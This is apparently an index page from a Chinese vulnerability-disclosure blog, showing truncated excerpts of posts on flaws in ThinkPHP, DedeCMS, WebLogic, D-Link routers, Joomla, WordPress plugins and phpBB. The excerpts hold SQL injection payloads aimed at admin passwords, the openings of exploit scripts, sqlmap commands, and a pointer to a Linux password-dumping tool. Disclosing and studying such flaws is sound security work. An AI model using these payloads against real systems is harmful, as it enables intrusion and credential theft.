• thinkphp3.2.3注入漏洞

    thinkphp3.2.3注入漏洞
    这个漏洞是基于thinkphp3.2.3开发引起的。 漏洞一 由于oauth_reg方法中调用了login来验证当前会员是否登陆,所以咱们需要注册一个会员帐户再利用该漏洞,这里玩注册用户名和密码均为test123的帐户,然后构造如下cookie: members_bind_info[keyid][0]=exp; members_bind_info[keyid][1]==1 or updatexml(0,concat(0xa,(SELECT password FROM xx_admin limit 1)),0)%23 mem...
    作者:unhonker| 发布:2018年3月05日 | 分类:漏洞公布 | 阅读:1,178次| 标签:
  • Dedecms任意用户登录

    Dedecms任意用户登录
    ##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE;...
    作者:unhonker| 发布:2018年1月23日 | 分类:漏洞公布 | 阅读:877次| 标签:
  • Weblogic(CVE-2017-10271)漏洞Exp

    Weblogic(CVE-2017-10271)漏洞Exp
    文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有 CVE-2017-10271 EXP ''' import requests,sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) ...
    作者:unhonker| 发布:2017年12月27日 | 分类:漏洞公布 | 阅读:1,928次| 标签:,
  • D-Link DIR8xx 远程代码执行漏洞

    D-Link DIR8xx 远程代码执行漏洞
    脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): ...
    作者:unhonker| 发布:2017年9月16日 | 分类:漏洞公布 | 阅读:1,750次| 标签:
  • Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

    Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: Wi...
    作者:unhonker| 发布:2017年8月29日 | 分类:漏洞公布 | 阅读:1,525次| 标签:
  • phpBB 3.2.0 Server Side Request Forgery

    phpBB 3.2.0 Server Side Request Forgery
    title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult V...
    作者:unhonker| 发布:2017年8月07日 | 分类:漏洞公布 | 阅读:2,143次| 标签:
  • WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

    WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection
    # Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST[‘CatID’] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05...
    作者:unhonker| 发布:2017年6月28日 | 分类:漏洞公布 | 阅读:3,197次| 标签:
  • WordPress Huge-IT Video Gallery 2.0.4 SQL注入

    WordPress Huge-IT Video Gallery 2.0.4 SQL注入
    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...
    作者:unhonker| 发布:2017年5月30日 | 分类:漏洞公布 | 阅读:2,684次| 标签:
  • WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

    WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability
    1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...
    作者:unhonker| 发布:2017年4月26日 | 分类:漏洞公布 | 阅读:2,885次| 标签:
  • Linux下密码抓取神器mimipenguin

    Linux下密码抓取神器mimipenguin
    下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) VSFTPd 3.0.3-8+b1 (Active FTP client connections...
    作者:unhonker| 发布:2017年4月06日 | 分类:个人关注 | 阅读:2,467次| 标签: